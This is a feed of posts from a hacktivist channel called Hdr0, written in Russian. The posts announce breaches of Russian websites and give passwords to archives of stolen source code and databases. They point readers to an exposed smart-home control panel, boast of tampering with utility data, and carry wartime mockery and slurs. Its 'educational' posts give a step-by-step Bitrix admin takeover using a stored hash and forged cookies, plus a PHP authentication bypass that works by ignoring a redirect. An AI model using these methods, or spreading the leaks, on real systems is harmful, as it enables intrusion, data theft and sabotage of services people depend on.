Hdr0

Добрый вечер подписота Сегодня на ужин мы приготовили вам сайт с ебейшим названием в 161 символ ГОСУДАРСТВЕННОЕ АВТОНОМНОЕ УЧРЕЖДЕНИЕ РЕСПУБЛИКИ ДАГЕСТАН «МНОГОФУНКЦИОНАЛЬНЫЙ ЦЕНТР ПРЕДОСТАВЛЕНИЯ ГОСУДАРСТВЕННЫХ И МУНИЦИПАЛЬНЫХ УСЛУГ В РЕСПУБЛИКЕ ДАГЕСТАН» mfcrd.ru Если вы плохо разбираетесь в коде, можете просто поклацать фотки и почитать документы. Как обычно ниже ссылка на архив с исходниками и базой Архив Пароль: qxGKFolqSdGz6m3

В рамках заботы о простых людях, разместили простые но эффективные рекомендации, как действовать при встрече с беспилотниками на сайте Сертификационный центра педагогов. Считаем что каждый росиянец должен с малых лет знать как обезопасить себя и окружающих от летающей напастьи. Вебархив

Сегодня приглашаем наших дорогих читателей в умный дом с не очень умным владельцем: сверхразум из Новосибирска догадался сделать панель управления умным домом открытым и теперь каждый может настроить обогрев, полив и освещение в его намалой усасьбе на свой вкус. Ломать тут особо нечего, а вот поиграться с включателями можно. https://217.70.122.160/

Добрый вечер, подписчики! Сегодня мы порадуем вас материалами с сайта topbanki.ru (исходники и база данных) для изучения исходного кода и тренировки навыков проникновения. Обращаем ваше внимание, что все материалы сгенерированы нейросетью, и любое совпадение с реальными данными — это приятная случайность. Архив Пароль: 16cG041L8gijirT

Привет, друзья! Сегодня пятница, а по пятницам у нас каждую среду образовательная рубрика. Авторизация в BITRIX Ситуация: У вас есть возможность вносить изменения в базу данных (SQL инъекция, phpMyAdmin, 3306 и т.д.), и нужно быстро залогиниться в админку, не наводя суеты. Не проблема! Для этого разработчики предусмотрели функцию авторизации по сгенерированному хешу. Что мы делаем, чтобы попасть в админку: Генерируем MY_HASH Меняем настройки b_option: main

allow_external_auth_stored_hash=Y

Добавляем наш хеш в b_user:

STORED_HASH = MY_HASH

Лишним не будет b_user_stored_auth:

STORED_HASH = MY_HASH

Создаем в браузере COOKIE:

BITRIX_SM_UIDL=USERNAME(admin) BITRIX_SM_UIDH=MY_HASH

Заходим в админку Надеюсь, это было полезно!

Русский Ванька, радуйся, сегодня ты купишь себе немного больше водки. Добрые хакеры Hdr0 более месяца вносили изменения в показатели “фонда капитального ремонта” где-то на болотах, чтобы изменения наверняка попали в бекапы. Счастливого набутыливания админам.

Друзья, не забывайте, что знание своей истории — это ключ к пониманию своего места в мире и осознанию истинных ценностей. На фоне ядерных учений московитов, портал невыдуманых историй moscowia.su напоминает чем закончилась подобная история в 1812 году.

Привет друзья! Сегодня образовательная рубрика. Файл: /sites/default/new_demo/users.php

session_start(); 
if (!login($db) || $_SESSION['auth_uid_demo'] != 10) {
  header('Location: login.php');
}
$res = mysqli_query($db, "SELECT * FROM user");
$rows = mysqli_fetch_all($res, MYSQLI_ASSOC);

Что у нас тут? Проверка на авторизацию пользователя, которая, в случае неудачи, редиректит его на страницу входа. Но фишка заключается в том, что после редиректа код не унывает и продолжает свою работу, выдавая нам полный функционал. И если мы запретим браузеру следовать по редиректу, то… о боже, да мы же получим доступ ко всему административному функционалу без какой-либо авторизации. И самое интересное, что такой оптимизированный код нам встречается регулярно. Предположительно, дело в дополнительной хромосоме. Как ни странно, такой кейс мы встретили на сайте IT-гиганта ISPsystem. И как обычно, исключительно в обучающих целях мы выкладываем исходник и базу ispsystem.ru и ispsystem.com. Пароль к архиву: 1GJn1NkwfO6ZxzP

Привет, друзья! Рубрика - Образовательная. Что у нас тут? Проверка на авторизацию пользователя, которая, в случае неудачи, редиректит его на страницу входа. Но фишка заключается в том, что после редиректа код не унывает и продолжает свою работу, выдавая нам полный функционал. И если мы запретим браузеру следовать по редиректу, то… о боже, да мы же получим доступ ко всему административному функционалу без какой-либо авторизации. И самое интересное, что такой оптимизированный код нам встречается регулярно. Предположительно, дело в дополнительной хромосоме. Как ни странно, такой кейс мы встретили на сайте IT-гиганта ISPsystem. Файл: /sites/default/new_demo/users.php

session_start(); 
if (!login($db) || $_SESSION['auth_uid_demo'] != 10) {
  header('Location: login.php');
}
$res = mysqli_query($db, "SELECT * FROM user");
$rows = mysqli_fetch_all($res, MYSQLI_ASSOC);

И как обычно, в обучающих целях мы выкладываем исходник и базу ispsystem.ru и ispsystem.com.

Друзья, сегодня передаем привет от наших злых друзей и создателей бестселлера “Не хочу уезжать из Крыма” всем, кто из нашего Крыма еще не съебался в сторону болот. Как сообщается на сайте kerch-most.ru, батя ATACMS уже в городе и готовится посетить Керченский мост с программой “Развалю ебало”. Мероприятие запланировано на 9 мая, следим.